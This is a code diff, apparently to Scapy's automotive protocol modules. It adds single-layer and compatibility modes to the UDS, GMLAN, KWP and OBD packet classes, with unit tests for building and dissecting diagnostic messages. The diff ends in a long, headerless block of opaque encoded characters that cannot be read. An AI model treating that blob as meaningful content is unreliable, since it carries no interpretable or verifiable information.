] @@ -1300,22 +1442,26 @@ def answers(self, other): bind_layers(UDS, UDS_TDPR, service=0x76) +UDS._service_cls[0x76] = UDS_TDPR # #########################RTE################################### class UDS_RTE(Packet): name = 'RequestTransferExit' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x37, UDS.services), _uds_slm), StrField('transferRequestParameterRecord', b"", fmt="B") ] bind_layers(UDS, UDS_RTE, service=0x37) +UDS._service_cls[0x37] = UDS_RTE class UDS_RTEPR(Packet): name = 'RequestTransferExitPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x77, UDS.services), _uds_slm), StrField('transferResponseParameterRecord', b"", fmt="B") ] @@ -1324,6 +1470,7 @@ def answers(self, other): bind_layers(UDS, UDS_RTEPR, service=0x77) +UDS._service_cls[0x77] = UDS_RTEPR # #########################RFT################################### @@ -1344,6 +1491,7 @@ def _contains_file_size(packet): return packet.modeOfOperation not in [2, 4, 5] fields_desc = [ + ConditionalField(XByteEnumField('service', 0x38, UDS.services), _uds_slm), XByteEnumField('modeOfOperation', 0, modeOfOperations), FieldLenField('filePathAndNameLength', None, length_of='filePathAndName', fmt='H'), @@ -1369,6 +1517,7 @@ def _contains_file_size(packet): bind_layers(UDS, UDS_RFT, service=0x38) +UDS._service_cls[0x38] = UDS_RFT class UDS_RFTPR(Packet): @@ -1379,6 +1528,7 @@ def _contains_data_format_identifier(packet): return packet.modeOfOperation != 0x02 fields_desc = [ + ConditionalField(XByteEnumField('service', 0x78, UDS.services), _uds_slm), XByteEnumField('modeOfOperation', 0, UDS_RFT.modeOfOperations), ConditionalField(FieldLenField('lengthFormatIdentifier', None, length_of='maxNumberOfBlockLength', @@ -1411,22 +1561,26 @@ def answers(self, other): bind_layers(UDS, UDS_RFTPR, service=0x78) +UDS._service_cls[0x78] = UDS_RFTPR # #########################IOCBI################################### class UDS_IOCBI(Packet): name = 'InputOutputControlByIdentifier' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x2f, UDS.services), _uds_slm), XShortEnumField('dataIdentifier', 0, UDS_RDBI.dataIdentifiers), ] -bind_layers(UDS, UDS_IOCBI, service=0x2F) +bind_layers(UDS, UDS_IOCBI, service=0x2f) +UDS._service_cls[0x2f] = UDS_IOCBI class UDS_IOCBIPR(Packet): name = 'InputOutputControlByIdentifierPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x6f, UDS.services), _uds_slm), XShortEnumField('dataIdentifier', 0, UDS_RDBI.dataIdentifiers), ] @@ -1435,7 +1589,8 @@ def answers(self, other): and other.dataIdentifier == self.dataIdentifier -bind_layers(UDS, UDS_IOCBIPR, service=0x6F) +bind_layers(UDS, UDS_IOCBIPR, service=0x6f) +UDS._service_cls[0x6f] = UDS_IOCBIPR # #########################NR################################### @@ -1505,6 +1660,7 @@ class UDS_NR(Packet): } name = 'NegativeResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x7f, UDS.services), _uds_slm), XByteEnumField('requestServiceId', 0, UDS.services), ByteEnumField('negativeResponseCode', 0, negativeResponseCodes) ] @@ -1516,6 +1672,7 @@ def answers(self, other): bind_layers(UDS, UDS_NR, service=0x7f) +UDS._service_cls[0x7f] = UDS_NR # ################################################################## diff --git a/test/contrib/automotive/gm/gmlan.uts b/test/contrib/automotive/gm/gmlan.uts index 722b2bc974d..9b8d0a175aa 100644 --- a/test/contrib/automotive/gm/gmlan.uts +++ b/test/contrib/automotive/gm/gmlan.uts @@ -612,4 +612,128 @@ log = get_log(pkt) print(log) assert len(log) == 2 assert log[1] == "0x80" -assert log[0] == "DeviceControlPositiveResponse" \ No newline at end of file +assert log[0] == "DeviceControlPositiveResponse" ++ Single layer GMLAN mode + += Single layer mode: enable and basic dissect + +conf.contribs['GMLAN']['single_layer_mode'] = True + +ido = GMLAN(b'\x10\x02') +assert isinstance(ido, GMLAN_IDO), "Expected GMLAN_IDO, got %s" % type(ido) +assert ido.service == 0x10 +assert ido.subfunction == 0x02 + += Single layer mode: build GMLAN_IDO + +ido_built = GMLAN_IDO(subfunction=0x02) +assert bytes(ido_built) == b'\x10\x02', "Expected b'\\x10\\x02', got %s" % bytes(ido_built).hex() + += Single layer mode: dissect positive response (using SA which has a PR class) + +sapr = GMLAN(b'\x67\x01\xde\xad') +assert isinstance(sapr, GMLAN_SAPR), "Expected GMLAN_SAPR, got %s" % type(sapr) +assert sapr.service == 0x67 +assert sapr.subfunction == 0x01 + += Single layer mode: NegativeResponse dissect + +nr = GMLAN(b'\x7f\x10\x22') +assert isinstance(nr, GMLAN_NR), "Expected GMLAN_NR, got %s" % type(nr) +assert nr.service == 0x7f +assert nr.requestServiceId == 0x10 +assert nr.returnCode == 0x22 + += Single layer mode: NegativeResponse answers() + +ido2 = GMLAN_IDO(subfunction=0x02) +nr2 = GMLAN_NR(requestServiceId=0x10, returnCode=0x22) +assert nr2.answers(ido2) + += Single layer mode: hashret consistency between request and positive response (SA) + +sa3 = GMLAN_SA(subfunction=0x01) +sapr3 = GMLAN_SAPR(subfunction=0x01) +assert sa3.hashret() == sapr3.hashret(), \ + "hashret mismatch: %s vs %s" % (sa3.hashret().hex(), sapr3.hashret().hex()) + += Single layer mode: sub-subpacket bindings are unaffected + +rfrdpr = GMLAN(b'\x52\x01\x00\x01\x02\x03\x04') +assert isinstance(rfrdpr, GMLAN_RFRDPR), "Expected GMLAN_RFRDPR, got %s" % type(rfrdpr) + += Single layer mode: unknown service falls back to GMLAN + +unknown = GMLAN(b'\xBB\x01\x02') +assert isinstance(unknown, GMLAN), "Expected GMLAN fallback, got %s" % type(unknown) + += Single layer mode: switch back to multi-layer mode + +conf.contribs['GMLAN']['single_layer_mode'] = False + +ido4 = GMLAN(b'\x10\x02') +assert ido4.__class__ == GMLAN +assert ido4.service == 0x10 +assert ido4[GMLAN_IDO].subfunction == 0x02 + += Single layer mode: cleanup + +conf.contribs['GMLAN']['single_layer_mode'] = False +assert not conf.contribs['GMLAN']['single_layer_mode'] + ++ Compatibility mode GMLAN + += Compatibility mode: setup - enable both SLM and compat mode (default) + +conf.contribs['GMLAN']['single_layer_mode'] = True +conf.contribs['GMLAN']['compatibility_mode'] = True + += Compatibility mode ON + SLM ON: standalone sub-packet has service field + +ido_sa = GMLAN_IDO(subfunction=0x02) +assert bytes(ido_sa) == b'\x10\x02', \ + "Standalone GMLAN_IDO should include service byte, got %s" % bytes(ido_sa).hex() +assert ido_sa.service == 0x10 + += Compatibility mode ON + SLM ON: stacked sub-packet suppresses its service field + +stacked = GMLAN() / GMLAN_IDO(subfunction=0x02) +assert bytes(stacked) == b'\x10\x02', \ + "Stacked GMLAN/GMLAN_IDO should produce 2 bytes (no duplicate service), got %s" % bytes(stacked).hex() + += Compatibility mode ON + SLM ON: dissect standalone still works + +ido_dis = GMLAN(b'\x10\x02') +assert isinstance(ido_dis, GMLAN_IDO) +assert ido_dis.service == 0x10 +assert ido_dis.subfunction == 0x02 + += Compatibility mode OFF + SLM ON: stacked sub-packet always emits service field + +conf.contribs['GMLAN']['compatibility_mode'] = False + +stacked_nc = GMLAN() / GMLAN_IDO(subfunction=0x02) +assert bytes(stacked_nc) == b'\x10\x10\x02', \ + "With compat OFF, stacked GMLAN/GMLAN_IDO should produce 3 bytes, got %s" % bytes(stacked_nc).hex() + += Compatibility mode OFF + SLM ON: standalone sub-packet also has service field + +ido_nc = GMLAN_IDO(subfunction=0x02) +assert bytes(ido_nc) == b'\x10\x02', \ + "Standalone GMLAN_IDO should include service byte even with compat OFF, got %s" % bytes(ido_nc).hex() + += Compatibility mode: SLM OFF overrides compat mode - no service field in sub-packet + +conf.contribs['GMLAN']['single_layer_mode'] = False +conf.contribs['GMLAN']['compatibility_mode'] = False + +stacked_slm_off = GMLAN() / GMLAN_IDO(subfunction=0x02) +assert bytes(stacked_slm_off) == b'\x10\x02', \ + "With SLM OFF, no service field in GMLAN_IDO regardless of compat mode, got %s" % bytes(stacked_slm_off).hex() + += Compatibility mode: cleanup + +conf.contribs['GMLAN']['single_layer_mode'] = False +conf.contribs['GMLAN']['compatibility_mode'] = True +assert not conf.contribs['GMLAN']['single_layer_mode'] +assert conf.contribs['GMLAN']['compatibility_mode'] diff --git a/test/contrib/automotive/kwp.uts b/test/contrib/automotive/kwp.uts index d525b8554e6..73c99dff1a2 100644 --- a/test/contrib/automotive/kwp.uts +++ b/test/contrib/automotive/kwp.uts @@ -507,3 +507,144 @@ nrc = KWP(b'\x7f\x22\x33') assert nrc.service == 0x7f assert nrc.requestServiceId == 0x22 assert nrc.negativeResponseCode == 0x33 + ++ Single layer KWP mode + += Single layer mode: enable and basic dissect + +conf.contribs['KWP']['single_layer_mode'] = True + +sds = KWP(b'\x10\x01') +assert isinstance(sds, KWP_SDS), "Expected KWP_SDS, got %s" % type(sds) +assert sds.service == 0x10 +assert sds.diagnosticSession == 0x01 + += Single layer mode: build KWP_SDS + +sds_built = KWP_SDS(diagnosticSession=0x01) +assert bytes(sds_built) == b'\x10\x01', "Expected b'\\x10\\x01', got %s" % bytes(sds_built).hex() + += Single layer mode: dissect positive response + +sdspr = KWP(b'\x50\x01\xbe\xef') +assert isinstance(sdspr, KWP_SDSPR), "Expected KWP_SDSPR, got %s" % type(sdspr) +assert sdspr.service == 0x50 +assert sdspr.diagnosticSession == 0x01 + += Single layer mode: answers() between subpackets + +sds2 = KWP_SDS(diagnosticSession=0x01) +sdspr2 = KWP_SDSPR(diagnosticSession=0x01) +assert sdspr2.answers(sds2) + += Single layer mode: NegativeResponse dissect + +nr = KWP(b'\x7f\x10\x22') +assert isinstance(nr, KWP_NR), "Expected KWP_NR, got %s" % type(nr) +assert nr.service == 0x7f +assert nr.requestServiceId == 0x10 +assert nr.negativeResponseCode == 0x22 + += Single layer mode: NegativeResponse answers() + +sds3 = KWP_SDS(diagnosticSession=0x01) +nr2 = KWP_NR(requestServiceId=0x10, negativeResponseCode=0x22) +assert nr2.answers(sds3) + += Single layer mode: hashret consistency between request and positive response + +sds4 = KWP_SDS(diagnosticSession=0x01) +sdspr4 = KWP_SDSPR(diagnosticSession=0x01) +assert sds4.hashret() == sdspr4.hashret(), \ + "hashret mismatch: %s vs %s" % (sds4.hashret().hex(), sdspr4.hashret().hex()) + += Single layer mode: unknown service falls back to KWP + +unknown = KWP(b'\xAA\x01\x02') +assert isinstance(unknown, KWP), "Expected KWP fallback, got %s" % type(unknown) + += Single layer mode: switch back to multi-layer mode + +conf.contribs['KWP']['single_layer_mode'] = False + +sds5 = KWP(b'\x10\x01') +assert sds5.__class__ == KWP +assert sds5.service == 0x10 +assert sds5[KWP_SDS].diagnosticSession == 0x01 + += Single layer mode: idempotency + +conf.contribs['KWP']['single_layer_mode'] = True +conf.contribs['KWP']['single_layer_mode'] = True +sds6 = KWP(b'\x10\x01') +assert isinstance(sds6, KWP_SDS) + +conf.contribs['KWP']['single_layer_mode'] = False +conf.contribs['KWP']['single_layer_mode'] = False +sds7 = KWP(b'\x10\x01') +assert sds7.__class__ == KWP +count = sum(1 for fval, cls in KWP.payload_guess + if fval.get('service') == 0x10 and cls == KWP_SDS) +assert count == 1, "Expected 1 binding for KWP_SDS, got %d" % count + += Single layer mode: cleanup + +conf.contribs['KWP']['single_layer_mode'] = False +assert not conf.contribs['KWP']['single_layer_mode'] + ++ Compatibility mode KWP + += Compatibility mode: setup - enable both SLM and compat mode (default) + +conf.contribs['KWP']['single_layer_mode'] = True +conf.contribs['KWP']['compatibility_mode'] = True + += Compatibility mode ON + SLM ON: standalone sub-packet has service field + +sds_sa = KWP_SDS(diagnosticSession=0x01) +assert bytes(sds_sa) == b'\x10\x01', \ + "Standalone KWP_SDS should include service byte, got %s" % bytes(sds_sa).hex() +assert sds_sa.service == 0x10 + += Compatibility mode ON + SLM ON: stacked sub-packet suppresses its service field + +stacked = KWP() / KWP_SDS(diagnosticSession=0x01) +assert bytes(stacked) == b'\x10\x01', \ + "Stacked KWP/KWP_SDS should produce 2 bytes (no duplicate service), got %s" % bytes(stacked).hex() + += Compatibility mode ON + SLM ON: dissect standalone still works + +sds_dis = KWP(b'\x10\x01') +assert isinstance(sds_dis, KWP_SDS) +assert sds_dis.service == 0x10 +assert sds_dis.diagnosticSession == 0x01 + += Compatibility mode OFF + SLM ON: stacked sub-packet always emits service field + +conf.contribs['KWP']['compatibility_mode'] = False + +stacked_nc = KWP() / KWP_SDS(diagnosticSession=0x01) +assert bytes(stacked_nc) == b'\x10\x10\x01', \ + "With compat OFF, stacked KWP/KWP_SDS should produce 3 bytes, got %s" % bytes(stacked_nc).hex() + += Compatibility mode OFF + SLM ON: standalone sub-packet also has service field + +sds_nc = KWP_SDS(diagnosticSession=0x01) +assert bytes(sds_nc) == b'\x10\x01', \ + "Standalone KWP_SDS should include service byte even with compat OFF, got %s" % bytes(sds_nc).hex() + += Compatibility mode: SLM OFF overrides compat mode - no service field in sub-packet + +conf.contribs['KWP']['single_layer_mode'] = False +conf.contribs['KWP']['compatibility_mode'] = False + +stacked_slm_off = KWP() / KWP_SDS(diagnosticSession=0x01) +assert bytes(stacked_slm_off) == b'\x10\x01', \ + "With SLM OFF, no service field in KWP_SDS regardless of compat mode, got %s" % bytes(stacked_slm_off).hex() + += Compatibility mode: cleanup + +conf.contribs['KWP']['single_layer_mode'] = False +conf.contribs['KWP']['compatibility_mode'] = True +assert not conf.contribs['KWP']['single_layer_mode'] +assert conf.contribs['KWP']['compatibility_mode'] diff --git a/test/contrib/automotive/obd/obd.uts b/test/contrib/automotive/obd/obd.uts index fa65e95e447..2c5e8e71e11 100644 --- a/test/contrib/automotive/obd/obd.uts +++ b/test/contrib/automotive/obd/obd.uts @@ -1031,3 +1031,127 @@ assert b[22:] == b'ABCDEFGHIJKLMNOP' r = OBD(b'\x09\x02\x04') assert p.answers(r) + ++ Single layer OBD mode + += Single layer mode: enable and basic dissect + +conf.contribs['OBD']['single_layer_mode'] = True + +s01 = OBD(b'\x01\x0c') +assert isinstance(s01, OBD_S01), "Expected OBD_S01, got %s" % type(s01) +assert s01.service == 0x01 + += Single layer mode: build OBD_S01 + +s01_built = OBD_S01(pid=[0x0c]) +assert bytes(s01_built) == b'\x01\x0c', "Expected b'\\x01\\x0c', got %s" % bytes(s01_built).hex() + += Single layer mode: dissect positive response + +s01pr = OBD(b'\x41\x0c\x0f\xa0') +assert isinstance(s01pr, OBD_S01_PR), "Expected OBD_S01_PR, got %s" % type(s01pr) +assert s01pr.service == 0x41 + += Single layer mode: NegativeResponse dissect + +nr = OBD(b'\x7f\x01\x22') +assert isinstance(nr, OBD_NR), "Expected OBD_NR, got %s" % type(nr) +assert nr.service == 0x7f +assert nr.request_service_id == 0x01 +assert nr.response_code == 0x22 + += Single layer mode: NegativeResponse answers() + +s01_2 = OBD_S01(pid=[0x0c]) +nr2 = OBD_NR(request_service_id=0x01, response_code=0x22) +assert nr2.answers(s01_2) + += Single layer mode: hashret consistency between request and positive response + +s09 = OBD_S09(iid=[0x02]) +s09pr = OBD_S09_PR() +assert s09.hashret() == s09pr.hashret(), \ + "hashret mismatch: %s vs %s" % (s09.hashret().hex(), s09pr.hashret().hex()) + += Single layer mode: unknown service falls back to OBD + +unknown = OBD(b'\xBB\x01\x02') +assert isinstance(unknown, OBD), "Expected OBD fallback, got %s" % type(unknown) + += Single layer mode: switch back to multi-layer mode + +conf.contribs['OBD']['single_layer_mode'] = False + +s01_3 = OBD(b'\x01\x0c') +assert s01_3.__class__ == OBD +assert s01_3.service == 0x01 +assert isinstance(s01_3[OBD_S01], OBD_S01) + += Single layer mode: cleanup + +conf.contribs['OBD']['single_layer_mode'] = False +assert not conf.contribs['OBD']['single_layer_mode'] + ++ Compatibility mode OBD + += Compatibility mode: setup - enable both SLM and compat mode (default) + +conf.contribs['OBD']['single_layer_mode'] = True +conf.contribs['OBD']['compatibility_mode'] = True + += Compatibility mode ON + SLM ON: standalone sub-packet has service field + +s01_sa = OBD_S01(pid=[0x0c]) +assert bytes(s01_sa)[0:1] == b'\x01', \ + "Standalone OBD_S01 should include service byte 0x01, got %s" % bytes(s01_sa).hex() + += Compatibility mode ON + SLM ON: stacked sub-packet suppresses its service field + +stacked = OBD() / OBD_S01(pid=[0x0c]) +stacked_bytes = bytes(stacked) +assert stacked_bytes[0:1] == b'\x01', \ + "Stacked OBD/OBD_S01 first byte should be 0x01 (OBD service), got %s" % stacked_bytes.hex() +assert stacked_bytes[1:2] != b'\x01', \ + "No duplicate service byte expected, got %s" % stacked_bytes.hex() +assert len(stacked_bytes) == 2, \ + "Stacked OBD/OBD_S01(pid=[0x0c]) should be 2 bytes, got %s" % stacked_bytes.hex() + += Compatibility mode ON + SLM ON: dissect standalone still works + +s01_dis = OBD(b'\x01\x0c') +assert isinstance(s01_dis, OBD_S01) + += Compatibility mode OFF + SLM ON: stacked sub-packet always emits service field + +conf.contribs['OBD']['compatibility_mode'] = False + +stacked_nc = OBD() / OBD_S01(pid=[0x0c]) +stacked_nc_bytes = bytes(stacked_nc) +assert len(stacked_nc_bytes) == 3, \ + "With compat OFF, stacked OBD/OBD_S01 should produce 3 bytes (duplicate service), got %s" % stacked_nc_bytes.hex() +assert stacked_nc_bytes[0:1] == b'\x01' and stacked_nc_bytes[1:2] == b'\x01', \ + "With compat OFF, first two bytes should both be service 0x01, got %s" % stacked_nc_bytes.hex() + += Compatibility mode OFF + SLM ON: standalone sub-packet also has service field + +s01_nc = OBD_S01(pid=[0x0c]) +assert bytes(s01_nc)[0:1] == b'\x01', \ + "Standalone OBD_S01 should include service byte even with compat OFF" + += Compatibility mode: SLM OFF overrides compat mode - no service field in sub-packet + +conf.contribs['OBD']['single_layer_mode'] = False +conf.contribs['OBD']['compatibility_mode'] = False + +stacked_slm_off = OBD() / OBD_S01(pid=[0x0c]) +slm_off_bytes = bytes(stacked_slm_off) +assert len(slm_off_bytes) == 2, \ + "With SLM OFF, no service field in OBD_S01 regardless of compat mode, got %s" % slm_off_bytes.hex() + += Compatibility mode: cleanup + +conf.contribs['OBD']['single_layer_mode'] = False +conf.contribs['OBD']['compatibility_mode'] = True +assert not conf.contribs['OBD']['single_layer_mode'] +assert conf.contribs['OBD']['compatibility_mode'] diff --git a/test/contrib/automotive/uds.uts b/test/contrib/automotive/uds.uts index 1545076039d..e4a6bf07ba8 100644 --- a/test/contrib/automotive/uds.uts +++ b/test/contrib/automotive/uds.uts @@ -1438,3 +1438,179 @@ nrc = UDS(b'\x7f\x22\x33') assert nrc.service == 0x7f assert nrc.requestServiceId == 0x22 assert nrc.negativeResponseCode == 0x33 + ++ Single layer UDS mode + += Single layer mode: enable and basic dissect + +conf.contribs['UDS']['single_layer_mode'] = True + +dsc = UDS(b'\x10\x01') +assert isinstance(dsc, UDS_DSC), "Expected UDS_DSC, got %s" % type(dsc) +assert dsc.service == 0x10 +assert dsc.diagnosticSessionType == 0x01 + += Single layer mode: build UDS_DSC + +dsc_built = UDS_DSC(diagnosticSessionType=0x01) +assert bytes(dsc_built) == b'\x10\x01', "Expected b'\\x10\\x01', got %s" % bytes(dsc_built).hex() + += Single layer mode: UDS() / UDS_DSC() still works in single layer mode + +dsc_two = UDS_DSC(service=0x10, diagnosticSessionType=0x01) +assert dsc_two.service == 0x10 +assert dsc_two.diagnosticSessionType == 0x01 + += Single layer mode: dissect positive response + +dscpr = UDS(b'\x50\x01beef') +assert isinstance(dscpr, UDS_DSCPR), "Expected UDS_DSCPR, got %s" % type(dscpr) +assert dscpr.service == 0x50 +assert dscpr.diagnosticSessionType == 0x01 +assert dscpr.sessionParameterRecord == b"beef" + += Single layer mode: answers() between subpackets + +dsc = UDS_DSC(diagnosticSessionType=0x01) +dscpr = UDS_DSCPR(diagnosticSessionType=0x01, sessionParameterRecord=b"beef") +assert dscpr.answers(dsc) + += Single layer mode: answers() negative (different session type) + +dsc2 = UDS_DSC(diagnosticSessionType=0x02) +dscpr2 = UDS_DSCPR(diagnosticSessionType=0x01) +assert not dscpr2.answers(dsc2) + += Single layer mode: NegativeResponse dissect + +nr = UDS(b'\x7f\x10\x22') +assert isinstance(nr, UDS_NR), "Expected UDS_NR, got %s" % type(nr) +assert nr.service == 0x7f +assert nr.requestServiceId == 0x10 +assert nr.negativeResponseCode == 0x22 + += Single layer mode: NegativeResponse answers() + +dsc3 = UDS_DSC(diagnosticSessionType=0x01) +nr2 = UDS_NR(requestServiceId=0x10, negativeResponseCode=0x22) +assert nr2.answers(dsc3) + += Single layer mode: NegativeResponse does not answer wrong service + +er = UDS_ER(resetType=0x01) +assert not nr2.answers(er) + += Single layer mode: hashret consistency between request and positive response + +dsc4 = UDS_DSC(diagnosticSessionType=0x01) +dscpr4 = UDS_DSCPR(diagnosticSessionType=0x01) +assert dsc4.hashret() == dscpr4.hashret(), \ + "hashret mismatch: %s vs %s" % (dsc4.hashret().hex(), dscpr4.hashret().hex()) + += Single layer mode: UDS_RDBI dissect + +rdbi = UDS(b'\x22\x01\x02\x03\x04') +assert isinstance(rdbi, UDS_RDBI), "Expected UDS_RDBI, got %s" % type(rdbi) +assert rdbi.service == 0x22 + += Single layer mode: unknown service falls back to UDS + +unknown = UDS(b'\xAA\x01\x02') +assert isinstance(unknown, UDS), "Expected UDS fallback, got %s" % type(unknown) + += Single layer mode: switch back to multi-layer mode + +conf.contribs['UDS']['single_layer_mode'] = False + +dsc5 = UDS(b'\x10\x01') +assert dsc5.__class__ == UDS +assert dsc5.service == 0x10 +assert dsc5[UDS_DSC].diagnosticSessionType == 0x01 + +dscpr5 = UDS(b'\x50\x01beef') +assert dscpr5.__class__ == UDS +assert dscpr5.service == 0x50 +assert dscpr5[UDS_DSCPR].diagnosticSessionType == 0x01 + += Single layer mode: enable via conf directly + +conf.contribs['UDS']['single_layer_mode'] = True + +er6 = UDS(b'\x11\x01') +assert isinstance(er6, UDS_ER), "Expected UDS_ER, got %s" % type(er6) +assert er6.service == 0x11 +assert er6.resetType == 0x01 + += Single layer mode: final cleanup - restore default multi-layer mode + +conf.contribs['UDS']['single_layer_mode'] = False +assert not conf.contribs['UDS']['single_layer_mode'] + ++ Compatibility mode UDS + += Compatibility mode: setup - enable both SLM and compat mode (default) + +conf.contribs['UDS']['single_layer_mode'] = True +conf.contribs['UDS']['compatibility_mode'] = True + += Compatibility mode ON + SLM ON: standalone sub-packet has service field + +dsc_sa = UDS_DSC(diagnosticSessionType=0x01) +assert bytes(dsc_sa) == b'\x10\x01', \ + "Standalone UDS_DSC should include service byte, got %s" % bytes(dsc_sa).hex() +assert dsc_sa.service == 0x10 + += Compatibility mode ON + SLM ON: stacked sub-packet suppresses its service field + +stacked = UDS() / UDS_DSC(diagnosticSessionType=0x01) +assert bytes(stacked) == b'\x10\x01', \ + "Stacked UDS/UDS_DSC should produce 2 bytes (no duplicate service), got %s" % bytes(stacked).hex() + += Compatibility mode ON + SLM ON: positive response stacked suppresses service + +stacked_pr = UDS() / UDS_DSCPR(diagnosticSessionType=0x01, sessionParameterRecord=b"") +assert bytes(stacked_pr) == b'\x50\x01', \ + "Stacked UDS/UDS_DSCPR should produce 2 bytes, got %s" % bytes(stacked_pr).hex() + += Compatibility mode ON + SLM ON: dissect standalone still works + +dsc_dis = UDS(b'\x10\x01') +assert isinstance(dsc_dis, UDS_DSC) +assert dsc_dis.service == 0x10 +assert dsc_dis.diagnosticSessionType == 0x01 + += Compatibility mode OFF + SLM ON: stacked sub-packet always emits service field + +conf.contribs['UDS']['compatibility_mode'] = False + +stacked_nc = UDS() / UDS_DSC(diagnosticSessionType=0x01) +assert bytes(stacked_nc) == b'\x10\x10\x01', \ + "With compat OFF, stacked UDS/UDS_DSC should produce 3 bytes (duplicate service), got %s" % bytes(stacked_nc).hex() + += Compatibility mode OFF + SLM ON: standalone sub-packet also has service field + +dsc_nc = UDS_DSC(diagnosticSessionType=0x01) +assert bytes(dsc_nc) == b'\x10\x01', \ + "Standalone UDS_DSC should include service byte even with compat OFF, got %s" % bytes(dsc_nc).hex() + += Compatibility mode OFF + SLM ON: dissect standalone still works + +dsc_dis2 = UDS(b'\x10\x01') +assert isinstance(dsc_dis2, UDS_DSC) +assert dsc_dis2.service == 0x10 + += Compatibility mode: SLM OFF overrides compat mode - no service field in sub-packet + +conf.contribs['UDS']['single_layer_mode'] = False +conf.contribs['UDS']['compatibility_mode'] = False + +stacked_slm_off = UDS() / UDS_DSC(diagnosticSessionType=0x01) +assert bytes(stacked_slm_off) == b'\x10\x01', \ + "With SLM OFF, no service field in UDS_DSC regardless of compat mode, got %s" % bytes(stacked_slm_off).hex() + += Compatibility mode: cleanup + +conf.contribs['UDS']['single_layer_mode'] = False +conf.contribs['UDS']['compatibility_mode'] = True +assert not conf.contribs['UDS']['single_layer_mode'] +assert conf.contribs['UDS']['compatibility_mode']

      l zI~-AF6Sju?#7IuN-)~vs_LeUpYHg+MC*m}-seZxkuaMo^%=(AzCu}%l9tMg5ftRya zgXy)-p$RE?8qpWn9uSlw^c$V0k!!H!+U`Sk*~zsPwSJ=S%RYog$pnm_aGvR1hKdwb zrT($0%`oP!c88coqCMKwH46PF2KHqKt+!kLO&0?YwBr)W^l-Hz+h0rVl0%Bu_Ub`Q z0Qyw4Znc&&uTDEZaM0a+GZXEIuv1(c&C~23d9eKTO9_p4NkryD;!pWf7x@K85C4*! z%NeA@NutqP$4f zWldnD>pefLB{8O-P}0+}xF@*Cds+~syh34HoLr1cP;E5OCU($etXtVA4s)qea!K6i zc67SXq`}}zg&)^v)6U_C=o91N|Te@ZaY{`kmlbCYT?)5Lzmm3dIaJQo$m zltWq5(DMBcPjBy5tg*H4?)?dqSuoI5;0B7RdapQI947v;b6uMoVv48Ki2E9+=~%Kt ztk8$s&-}#W))c1!+S)DiAMjI%O0baNO+Ebk&5cCACW&V8FAjE1CcY*o*ri25KAD`X zt56d-dP$`v^R2dyBg<={5E}`;?o}KCs=P*|G@U`CZ}Eeuirwq?CzT>fjy1RnFtWDF zD%0vI=CBaE@c~opM?Y)^GCK%!ux{zM#*pvY z3>FttKrvkeEF?Xl!a(OHm4BXRjF&=WR^dv?L~Wc`c)P0f9D+{Y=*2uV)cv(;_N93| zJW3*#kjz401~-3hC=gPoovu8plHLz4XG;<#;0>4=L>D%FPL!%)S|7YSkKl&bUAmMU z?l2*=dcgz@{e)uHcZ0E4vc6wSA zTSH4iJz{9D6v27d$|ShO^$zBQ>+n^QBcsQK-#e$%8t}NnDky<6#9YbT)@pUX->Rx| z^>4jBIK@ucO0XLCG1J33BFO|+mO{IzMZJVkCJu|8?IfnmlP*yudY z0$y)(oQo>60Zj=8iV-V&${PSazOD9CG~wtnV_Y{xlA(SNboygs5ueFV>b9`|D7cWA z-VqYBmkWl#xDQ2&9m`&?j?L3z{lWfzdI7LpHP>IMTJ2}>Ug!qd zv<^1ieT`=$4xdO6>+0*f5h+Kbrh|cy;9uY1snb!?932?KL7z4k@kIjfE5FnCs4Y{BMJbkSF;F2fF-hO!&*NeL-aWIGtE?@FSftjcF6Ug2*0bK9x0#H zq7lu+Fu7H94EDGp(a%kf73U=fNzk4K?sS(DqtD}Uwoigu>jn%kN z+C(1kOho}@}3AH2qUv&EBU6V-_HqN|R< z`70NaHrIvI8_VO2yXce*U3bO}o$uX0I@7R9DJ5@r?nTgwX45|&Wa^Z)er4(YTIpkg zr#v~4WF+R}Z6~B3jtY_g>dji@Z;7%ITauWKiB(C?(0vTGvqR&vn^VpszR!ctzt9YX z9Xn?=TJG!5K<!So8&yStkeGHva=r$ItG0@r=B|C+(` z=1^-9o|)}Z6kZtUa_mRrmfo)+6n!_J19v55ME;F;@{S8mlBUyL;k{}2osn4sL0F}r zQkO4zo{{sfDQvdVCgOx=Vu_tp@@8fR7H z-EclQ9fCO}T?~bX_C7YELYOOCRV>qwQBoiHxW0F)EqckIHnJirA)}nGcM}sySzVeK zOBghe@GFkJ&pFA@`xN}tLxS?8R(ySNd3JVaq$kb!=4*T^Z;H^y*3TD8jpF<3TTB*b zPCbG{0xN5J)eB5`sYa$8`sa>uu}z51mTL8^+%V^rdbIp4>{*{&iBPQkk;Q#XDg)0G zb{}Q6v2$_MWwoZm^(50ySi^WPp*0Olr&P)KW<^Qw=sF^D;PRDyl#rgU8Aao0I+6%% zUJ8Xf=0XqlI6kq>z4eh6N5fZEed(~0Dh`XO{=__+B zeZP;69iQMV&kkG!+Ncj+Oq1S6{q~LnZLQD4SN;5(2^-XPCSI+<;%KTG1$(l1Z2`P= zH`+bXskn(&9r~u3^6sley5s2*5@!o!_|6)owD8~WoZo6Ia;lRM+L1EKnm|Ee{tDon zdC+TbYJKLSq}{#&n}T%hk15560Ws!H|Mv8Ytucmwv>*^t1a}+1(P|VCJ3`m6xq(}E z@Q7||wl3H$D^FZV%W5HrB;qSwXzt^isY`xu6^`*f0_f9c4p}in2HfF(H%`;W;`(Gv zY<`w$I$kn$tfRWJa1>3`S1AxAjrMNY>$T`Lx3+r2$W}u#8W~l8clX9B&x_N8i|+aK zO3-mprnkxzj<2@o)F;b(2|HZkalydo2rWN?>Jx4(cZ7&w{mAK_F^`XKGn(QvXSAqZ zN-D{a!m_$FnjK^{f!}^wbnG)1S>j+70#roXXI2#MrgmF5Es@z0TljwadEw8iTjTv= zH9>Bt;(WUD+-wL^Yt%cr6Du#8$m|)RbK-dNJv^2Y6A8ss!}bI0iOq(TdktLV%XYTcWHRm`h+dD7$GeT$irbZ9GTZ2dNmpLx(ukX+~-Hpqacwf%Fc%@}o z5O+LzCItCbko$Ou6{cj*Z7V2(oug9-wrIBD5tFKoIM0(^jIJ^Avmby!{PMjt+l=#A{!C4rClg_9rjCbqC;$R3*k^!axkE{IqQq>Bfw> 